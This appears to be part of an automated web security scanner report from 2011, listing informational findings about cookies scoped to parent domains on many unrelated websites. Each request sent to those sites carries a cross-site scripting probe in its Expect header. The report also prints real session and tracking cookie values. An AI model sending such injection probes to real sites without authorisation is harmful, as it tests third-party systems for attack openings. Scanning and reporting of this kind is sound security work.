bkst=KJhkMp2ny69RCtXGYYSNQbBxcaye2dK2ml9yNkQPuG7HMGGUnArQcDGuz4REaY5lDDHhWUxxOy57apIeQTrq3851GMz5fId8l4+zYplB/l4mn8Xcn4EifiLGjjRvTeSx0oi9jNRWOC1/+ePVVRD8ReqfrcUXZIw7Decmh8B3negNWN2r+/iRh9YS1iTaWDy9Wdg94lHhhdFPVs6S9b2ozv/P8D9k8x/AGSeVZFMDIf4Mp/tVARfMTlHFv/G+r76ANlBK2CmSSYi0RUISqwuIrdKmFUeLWr3aDH/BHMsmiZGltocETCO1VWfEpD7KKnU2V3JKpCHQGiZP0LAxB4rXzUslMjYw33WNPUMY2X+HbPdPJrd+tAxYYYmTy/HZOsBL5JRuD/Rq7VSxb+KcmX5Kndp8IQdwlsWW; bk=lQBumF16vaVVIHOf; bkc=KJh56qNv9NWxOK9prZQtHgRuiTYahADAPRiPMUZ9qzDikSEJYTiYyGGW1UDQWWM+pTnBBCjCYqbsWBx6aG/txr0XLpnj7P+IzsRT268lO4CKJFHIAZ9HSIQS4NkrmoifT9vEe+YvAGY9NJz7t3ak7C4UwsebuMCX0whZZ4wi39MW1qOpklZdGXN8XzR3znHBvmUXbDmjXIvHZUKKQza+8r+Bqzbntbq4qWgRX8n99SUtlfVlnm2Kxc7CEn+T3FNhgaNKNIRITLez82zCccMdd5iNvox8nlqBId+Nx7pdBwKAG+tTQEnwi8K1cTKWvm5p0fNbj+4XlfQw85SP5iwDErIStd5u64r8U2fzEdycUrr1WQ==

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:29:02 GMT
Set-Cookie: bklc=4dc0abde; expires=Fri, 06-May-2011 01:29:02 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=0Sj/NImFa2IVIHOf; expires=Mon, 31-Oct-2011 01:29:02 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56Many69zO4Ols+EDuizHPOy6HCahvcP0LSBeP7ayWm7iah9aCRGD6EkxWJ0NOk00msQG4QRlGSC5c9H5OJl3duB7XZfXyUFcuI8bHV9+PmCWfD9ObskwqgsguIphm4S2plf6gwTo0J+m8gBCTcBx/4hvQ7b1oFbync7M/P5ls69+u+vIIsiUUqzL4KB0YKQIvbh4jlbhnc7M39eW1EOdkUZkyjSXX5x/LesgD1p8lx5jXLjlrrXX9mKUZDIZtj/ll+cfFgLv0bDAzvOuIbdLszLnC0elfq1nKI0lq4qWsaFts94b47TzC5Uulp8hKHaA0HrfIFrqaRVT54FFMLKV28vl2/6c+sXravvze00ckz0rd7d+JLiNRlSNpAfFBU4KAX470fbXjjdhn0NsgMR=; expires=Mon, 31-Oct-2011 01:29:02 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQLmc48XF/1/AByrJQL9svZRnaFcACnYSsHYinZDsVMTcClrGeFGG1AkYV/W1PAcP00xbQeZBtOGj2RBR5G/bDhuYVvoYPpxBi9xeFROi+; expires=Mon, 31-Oct-2011 01:29:02 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHARKv09iCZ3sDb92R99/XBdcoAWHQjBJOArr/0DmimeBkiZOYpeYJUC8JNryLiQM0EeCYnMjzF9y9WNfqR5xCDpiiGlKhYfsi3sqvzfVvRWHRSB+tRr/6mf9yBeZAxkxyoRf/DeyZIG1iIHj90z/YWazQW798Lp/3HiQYcByaFJX//j8/wNqC92EJD1ecrHjJQjaiwJ4wB9BrtzOX/69sIzw4G=; expires=Mon, 31-Oct-2011 01:29:02 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Thu, 05-May-2011 01:29:02 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 1088
Content-Type: text/javascript
Connection: keep-alive

cbsiPrepBK(
{
"campaigns": [
{
"campaign": 16198,
"timestamp": 1304472542,
"categories": [
{
"categoryID": 75546,
"timestamp": 1304472542
}
]
},
{
"campaign": 1
...[SNIP]...

14.18. http://www.ally.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ally.ca
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ally.ca
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:19:01 GMT
Server:
Set-Cookie: TLTSID=7E4BAD1C75EC1075004D9FF5410C252D; Path=/; Domain=.ally.ca
Set-Cookie: TLTUID=7E4BAD1C75EC1075004D9FF5410C252D; Path=/; Domain=.ally.ca; Expires=Wed, 04-05-2021 01:19:01 GMT
HostName: TORGMLCORWB08
Content-Length: 389
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

14.19. http://www.bike.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bike.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bike.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CUR PSAi IVAi CONi OUR OTRo UNRo IND UNI PHYi ONL PUR FIN NAV"
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=A98E9A3C452DB98012B0FFBC73DECC41; Path=/; Domain=.bike.com
Set-Cookie: TLTUID=A98E9A3C452DB98012B0FFBC73DECC41; Path=/; Domain=.bike.com; expires=Wed, 04-05-2021 00:55:37 GMT
Date: Wed, 04 May 2011 00:55:36 GMT
Set-Cookie: NSC_Qfut-wjqt=e240663b3660;path=/


14.20. http://www.bizsiteservice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizsiteservice.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizsiteservice.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 Ok
Date: Wed, 4-May-2011 04:36:53 GMT
Server: ezot/3
Connection: close
Set-Cookie: s=ACHKAPRQFGAJLJGJPJ;path=/;domain=.bizsiteservice.com; HttpOnly

<html>
<head>
<meta http-equiv="Refresh" CONTENT="0; URL=http://www.bizsiteservice.com/home/_"></head><body></body></html>

14.21. http://www.customclassictrucks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customclassictrucks.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.customclassictrucks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1ekyz445diidt245sqag3x45; path=/; HttpOnly
Set-Cookie: UserPuid=2334369075916018239; domain=customclassictrucks.com; expires=Wed, 04-May-2061 00:44:39 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... .........................JMQ.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.<@D.JMQ.8<A.-16.-16.-16.-16.-16.-16.-16.-16.-16.-16.-16.-16.-16.-16.8<A.<@D.-16.-1
...[SNIP]...

14.22. http://www.diamond.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diamond.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diamond.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 03 May 2011 17:39:13 GMT
Content-Type: image/x-icon
Connection: keep-alive
Content-Length: 1406
Last-Modified: Sat, 11 Dec 2010 16:12:15 GMT
Accept-Ranges: bytes
ETag: "30eb272d4e99cb1:1f19"
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=9DB355437EA0212B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.diamond.com

..............h.......(....... ...............................}k|.........cQc.....................iXh.....XDW.........lZk.........................o\n.`M_..............p..................hVg...........
...[SNIP]...

14.23. http://www.garden.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.garden.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.garden.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="IDC DSP COR CUR PSAi IVAi CONi OUR OTRo UNRo IND UNI PHYi ONL PUR FIN NAV"
Set-Cookie: TLTSID=3ADA269D4C281F5508E9E58BB5DD7507; Path=/; Domain=.garden.com
Set-Cookie: TLTUID=3ADA269D4C281F5508E9E58BB5DD7507; Path=/; Domain=.garden.com; expires=Wed, 04-05-2021 01:53:06 GMT
Date: Wed, 04 May 2011 01:53:05 GMT
Set-Cookie: NSC_Qfut-wjqt=e24066383660;path=/


14.24. http://www.hlj.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hlj.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hlj.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:35:59 GMT
Content-Type: image/x-icon
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Content-Length: 318
Last-Modified: Tue, 07 Jun 2005 04:03:05 GMT
Accept-Ranges: bytes
Expires: Wed, 04 May 2011 04:35:59 GMT
Cache-Control: max-age=3600
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: HLJUserId=22X/QU3AyZ8hXh7lEHujAg==; expires=Thu, 03-May-12 03:35:59 GMT; domain=hlj.com; path=/

..............(.......(....... ...............................................ff..33..33..............f...3...................wwwwwDGwwwwww..WwwwwwD0.wwwwwwp.wwwwwwq.www@..s.wwwp.#t.wwwp.w0..W01.w@. 7
...[SNIP]...

14.25. http://www.intellichoice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intellichoice.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.intellichoice.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nd2hgt454l5cng55np4rs3mo; path=/; HttpOnly
Set-Cookie: UserPuid=2307924506250447917; domain=intellichoice.com; expires=Wed, 04-May-2061 01:11:25 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 43

GIF89a.......|.8...!.......,...........D..;

14.26. http://www.isound.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.isound.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.isound.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Wed, 04 May 2011 02:15:29 GMT
Content-Type: image/x-icon
Connection: keep-alive
Content-Length: 0
Last-Modified: Wed, 09 Feb 2011 18:51:34 GMT
CF-Cache-Status: HIT
Expires: Wed, 04 May 2011 04:15:29 GMT
Cache-Control: public, max-age=7200
Accept-Ranges: bytes
Set-Cookie: __cfduid=d526f9ec98a9edddada4718d87803ccaf1304475329; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.isound.com
Set-Cookie: __cfduid=d526f9ec98a9edddada4718d87803ccaf1304475329; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.isound.com


14.27. http://www.kidfanatics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kidfanatics.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kidfanatics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=06CBD9004C8F76C2A0021C9D122C29C4; Path=/; Domain=.kidfanatics.com
Set-Cookie: TLTSID=06CBD9004C8F76C2A0021C9D122C29C4; Path=/; Domain=.kidfanatics.com
Date: Wed, 04 May 2011 03:46:30 GMT
Set-Cookie: BIGipServerFFPartners-Pool=bUT17+fFku+LNJZCkOXOBIiay3o9W/ClYS14WCvpKUTDZisnEcDsbRdAqmBSJPXvIoRAlblbnQ==; path=/


14.28. http://www.krcrtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krcrtv.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.krcrtv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 21 Jul 2010 14:43:09 GMT
ETag: "7020e4b-47e-d2031940"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain
Cache-Control: max-age=695
Expires: Wed, 04 May 2011 03:19:52 GMT
Date: Wed, 04 May 2011 03:08:17 GMT
Connection: close
Set-Cookie: alpha=5dce8f18a260000021c3c04d4b910300feae0000; expires=Sat, 01-May-2021 03:08:17 GMT; path=/; domain=.krcrtv.com

............ .h.......(....... ..... .....@....................]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..]B..[E..tj..................|t..\I..]B..]B..]B..]B..]B..]B..c
...[SNIP]...

14.29. http://www.leaderinsurance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leaderinsurance.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leaderinsurance.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: TLTSID=C7FADEDB4C960E530058E3A045D2BB64; Path=/; Domain=.leaderinsurance.com
Set-Cookie: TLTUID=C7FADEDB4C960E530058E3A045D2BB64; Path=/; Domain=.leaderinsurance.com; expires=Wed, 04-05-2021 04:10:29 GMT
HostName: BHMWS12A2
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:10:29 GMT
Content-Length: 1245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

14.30. http://www.miami-dadeclerk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.miami-dadeclerk.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.miami-dadeclerk.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:52:01 GMT
Content-Length: 2346
Set-Cookie: NSC_xxxsfejs.njbnjebef.hpw=ffffffff09303f0a45525d5f4f58455e445a4a423660;Version=1;Max-Age=1800;path=/
Set-Cookie: citrix_ns_id=V+5+H+LLAolmpwUFYx1d0f3m9MIA1; Domain=.miami-dadeclerk.com; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...

14.31. http://www.musclemustangfastfords.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.musclemustangfastfords.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musclemustangfastfords.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:39:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fg2lgf45cg5jtoaa5ig5oviw; path=/; HttpOnly
Set-Cookie: UserPuid=2337541158280318506; domain=musclemustangfastfords.com; expires=Wed, 04-May-2061 01:38:59 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... ...........................................................................................................................{.1/1.....MNP...........................
...[SNIP]...

14.32. http://www.mustang50magazine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mustang50magazine.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mustang50magazine.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:17:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3ajmtebq3uejcaqaimznr130; path=/; HttpOnly
Set-Cookie: UserPuid=2346033608016811625; domain=mustang50magazine.com; expires=Wed, 04-May-2061 03:17:29 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

14.33. http://www.pets-seo-services.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pets-seo-services.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pets-seo-services.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Wed, 04 May 2011 02:31:14 GMT
Content-Type: image/vnd.microsoft.icon
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Content-Length: 0
CF-Cache-Status: EXPIRED
Expires: Wed, 04 May 2011 04:31:14 GMT
Cache-Control: public, max-age=7200
Set-Cookie: __cfduid=d4e5031c614dfe6a7eccf8fc6a83e0d3e1304476274; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.pets-seo-services.com
Set-Cookie: __cfduid=d4e5031c614dfe6a7eccf8fc6a83e0d3e1304476274; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.pets-seo-services.com


14.34. http://www.quantumjumping.com/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/ HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmx_k_180318845=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:53 GMT; path=/; domain=.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 113180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...

14.35. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css?ver=1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:58 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:59 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:53:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 35988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...

14.36. http://www.quantumjumping.com/blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blog/wp-content/themes/headway-10-perpetuity-test/media/css/box-classes.php?id=index HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
